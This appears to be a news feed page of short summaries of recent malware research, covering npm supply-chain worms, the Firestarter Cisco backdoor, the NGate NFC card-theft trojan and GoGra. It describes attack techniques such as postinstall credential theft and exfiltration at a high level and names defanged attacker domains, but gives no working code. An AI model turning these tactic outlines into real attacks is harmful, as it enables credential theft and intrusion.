All news with #malware tag

🔍 Cybersecurity researchers from Infoblox disclosed an international revenue‑share fraud campaign that uses multi‑step fake CAPTCHA pages to trick users into sending premium SMS messages. The scheme leverages traffic distribution systems and JavaScript back‑button hijacking to force multiple prefilled SMS sends to dozens of international numbers, with charges often appearing weeks later. Operators also repurpose Keitaro TDS instances and compromised licenses to scale cloaking, tracking, and delivery of scams and malware.

🔎 SentinelOne researchers have disclosed fast16, a Lua-based cyber‑sabotage framework compiled in 2005 that predates Stuxnet. The implant embeds a Lua 5.0 VM and encrypted bytecode inside a carrier binary svcmgmt.exe and pairs with a kernel driver that patches executables to corrupt high‑precision calculations. fast16 targets legacy Windows 2000/XP environments and engineering simulation tools, and its discovery revises the timeline of state-backed cyber sabotage.

🔒 Unit 42 describes a fundamental shift in the npm threat landscape following the September 2025 Shai‑Hulud worm and subsequent 2026 incidents. Adversaries now harvest npm and GitHub tokens to persist inside CI/CD pipelines, deploy dormant multi‑stage payloads, and automatically republish backdoored packages. The report attributes a broad, coordinated campaign to TeamPCP, documents propagation via Docker Hub, GitHub Actions and VS Code extensions, and recommends mitigations such as credential rotation, egress filtering, and dependency pinning.

🔥 A custom backdoor named Firestarter has been observed persisting on Cisco Firepower and Secure Firewall devices running ASA or FTD software, surviving reboots, firmware updates, and security patches. U.S. CISA and the U.K. NCSC link the activity to a threat actor tracked as UAT-4356, which exploited CVE-2025-20333 and CVE-2025-20362. Cisco recommends reimaging and upgrading affected devices; administrators can check compromise with show kernel process | include lina_cs, and CISA published YARA rules and mitigation guidance.

🐛Researchers from Socket have identified malicious npm packages that execute during installation to harvest credentials and developer artifacts, then attempt worm-like propagation across ecosystems. The payload targets cloud and CI/CD tokens, SSH keys, .npmrc files, browser profiles and crypto wallets, exfiltrating data via HTTPS webhooks and ICP endpoints. It attempts to republish compromised packages using stolen npm tokens and can also generate PyPI payloads via .pth injection. The campaign leverages blockchain-hosted canisters for C2 and remains under active investigation.

🔒 Mandiant attributes a newly documented cluster, UNC6692, with social-engineering campaigns via Microsoft Teams that coerce victims into installing malicious software and browser extensions. The actor leverages large-scale email-bombing to create urgency, then impersonates IT helpdesk staff to deliver an AutoHotkey-based installer hosted on attacker-controlled AWS S3. That installer loads the SNOW malware family — including SNOWBELT, SNOWGLAZE, and SNOWBASIN — enabling credential theft, tunneling, lateral movement, and data exfiltration.

🛡️Scammers are creating convincing fake tax authority websites worldwide to harvest credentials, steal personal data, and distribute malware embedded in downloaded “documents.” These portals also run fraudulent paid services that collect taxpayer identifiers and financial details for later abuse. Cryptocurrency holders are specifically targeted with fake verification flows that request seed phrases or wallet connections, leading to immediate theft. Kaspersky cautions against using cloud-hosted AI for tax preparation and recommends sticking to verified official channels, encrypting sensitive files, and employing reputable security tools.

🔐 A previously undocumented state-linked threat cluster dubbed GopherWhisper has been observed using a Go-based toolkit and legitimate services such as Microsoft 365 Outlook (via the Microsoft Graph API), Slack, and Discord to perform command-and-control and payload delivery. ESET identified the campaign targeting a Mongolian government entity and uncovered multiple backdoors — including LaxGopher, RatGopher, and BoxOfFriends — plus an exfiltration utility that uploads stolen archives to file.io. Analysts recovered thousands of Slack and Discord messages from attacker accounts, and telemetry including UTC+8 activity helped link the group to China.

🐿️ ESET researchers identified a previously undocumented China‑aligned APT group they named GopherWhisper, which targeted a Mongolian governmental entity and employed a broad toolkit of custom, mostly Go‑based malware. The group used injectors, loaders and multiple backdoors (notably LaxGopher, RatGopher and BoxOfFriends) and abused legitimate services—Slack, Discord, Microsoft 365 Outlook and file.io—for C&C and exfiltration. Recovery of attacker-operated Slack and Discord channels and Outlook draft messages provided extensive visibility into operator activity, development references and an operational cadence consistent with UTC+8.

⚠️ Cybersecurity researchers warn that unknown actors pushed malicious images to the official checkmarx/kics Docker Hub repository, overwriting tags and introducing a non-official release. Socket's analysis shows the bundled KICS binary was modified to collect, encrypt, and exfiltrate uncensored scan reports to an external endpoint, posing a high risk for IaC scans that may include credentials. Related Checkmarx Microsoft Visual Studio Code extensions (versions 1.17.0 and 1.19.0) were also found to contain code that downloads and runs a remote addon via the Bun runtime using a hardcoded GitHub URL without integrity checks. Organizations that used the affected images or extensions should assume exposed secrets are compromised and treat the event as a broader supply chain compromise.

🔐 Researchers warn of a self-propagating supply-chain worm that infected multiple npm packages to harvest developer credentials and reuse stolen npm tokens to publish poisoned releases. Tracked as CanisterSprawl by Socket and StepSecurity, the campaign uses malicious postinstall hooks and exfiltrates data to both an HTTPS webhook and an ICP canister. The malware also includes PyPI propagation via a .pth payload that runs on interpreter start; JFrog reported compromised xinference Python packages with a Base64 second-stage collector. Recommended mitigations include restricting token scope, rotating and revoking exposed tokens, avoiding unsafe CI triggers like pull_request_target, and monitoring package publishes and postinstall behavior.

🚨 Researchers have uncovered a self-propagating npm supply-chain attack that steals developer credentials and attempts to republish infected packages from compromised accounts. Socket and StepSecurity observed malicious versions in at least 16 Namastex Labs packages, including AI tooling and database modules. The payload harvests tokens, API keys, SSH keys, cloud and CI/CD credentials, browser-stored wallets, and attempts to use npm and PyPI publish tokens to inject itself into packages and spread.

💳 Cybercriminals have trojanized an Android NFC-relay application to capture contactless payment data and PINs, enabling cloning of cards and remote ATM cash-outs. ESET researchers report a new NGate malware variant was injected into the HandyPay app and distributed via a fake lottery site and a spoofed Google Play page targeting Android users in Brazil since November 2025. Traces in the injected code, including emoji markers in debug logs, led researchers to suspect use of generative AI, and ESET has published indicators and a MITRE ATT&CK mapping to aid detection.

🔐 Symantec researchers describe a new Linux variant of the GoGra backdoor that abuses Microsoft Graph API and Outlook mailboxes for stealthy command-and-control. The malware uses hardcoded Azure AD credentials to obtain OAuth2 tokens and polls a mailbox folder named "Zomato Pizza" for base64-encoded, AES-CBC-encrypted commands. A Go-based dropper hides an i386 ELF payload as a PDF and establishes persistence via systemd and an XDG autostart entry mimicking the Conky monitor. Processed commands are encrypted and returned by reply email with the subject "Output," and the original command email is removed to limit forensic visibility.

🛡️ Acronis researchers have identified a new variant of LOTUSLITE, attributed with medium confidence to the Chinese-linked Mustang Panda, being distributed via a banking-themed lure focused on India. The backdoor uses a dynamic DNS HTTPS C2 and supports remote shell access, file operations, and session management, indicating espionage-focused intent rather than financial theft. The campaign begins with a Compiled HTML (CHM) file that embeds a legitimate executable with a rogue DLL and triggers JavaScript fetched from cosmosmusic[.]com to perform DLL side-loading. The implanted DLL, dnx.onecore.dll, communicates with editor.gleeze[.]com, and similar artifacts were found targeting South Korean and U.S. policy and diplomatic communities.

🔒 ESET researchers uncovered a NGate Android campaign that trojanized the HandyPay NFC relay app to steal contactless card data and capture PINs for fraudulent ATM withdrawals. The poisoned app, spread via fake Rio de Prêmios sites and a deceptive Play Store listing, asks to be set as the default payment app and prompts users to enter their card PIN before tapping their card. Artifacts including emoji-laden debug messages suggest parts of the injected code may have been generated or modified with a large language model.

🔒 A new NGate variant is delivered inside a trojanized version of HandyPay, a legitimate NFC payments app, to steal payment card data from Android devices. Researchers at ESET say the campaign has been active since November 2025 and primarily targets users in Brazil, using fake Google Play pages and a malicious APK distribution chain. The trojan asks victims to set it as the default NFC payment app, collect card PINs and card taps, and exfiltrates data via a hardcoded email address.

🔒 ESET researchers discovered a new NGate malware variant that trojanized the legitimate HandyPay Android NFC-relay app, with injected code displaying artifacts consistent with GenAI-assisted development. The patched app silently forwards NFC payment card data and captures payment card PINs, exfiltrating them to attacker-controlled C&C infrastructure to enable contactless ATM cash-outs and unauthorized payments. Distribution targeted Android users in Brazil since November 2025 via a fake Rio de Prêmios lottery site and a counterfeit Google Play page; both samples were served from the same domain, indicating a single operator. ESET notified Google and the HandyPay developer; known samples are detected by Google Play Protect and ESET.

⚠️A cluster of 26 malicious apps on Apple's China App Store impersonated popular crypto wallets such as MetaMask, Coinbase, Trust Wallet, and OneKey to harvest recovery seed phrases and drain funds. The apps used typosquatting, fake branding, and were disguised as games or calculators to bypass local restrictions. They redirected victims to phishing pages that pushed trojanized wallets via abused iOS provisioning profiles; those trojans intercept mnemonics, encrypt them, and exfiltrate them. Kaspersky links the campaign, dubbed FakeWallet, to the ongoing SparkKitty operation, and Apple has removed the apps following disclosure.

🔎 Darktrace researchers have analyzed a newly identified malware called ZionSiphon that combines typical endpoint compromise techniques with functions tailored to industrial control systems, specifically targeting water treatment and desalination infrastructure. The sample includes privilege escalation, persistence, and USB-based propagation alongside environment and software checks for reverse osmosis and chlorine control. While it can scan OT protocols such as Modbus and attempt register modifications, implementation gaps and a country-validation flaw suggest the strain is an early-stage tool that may fail to activate in many environments.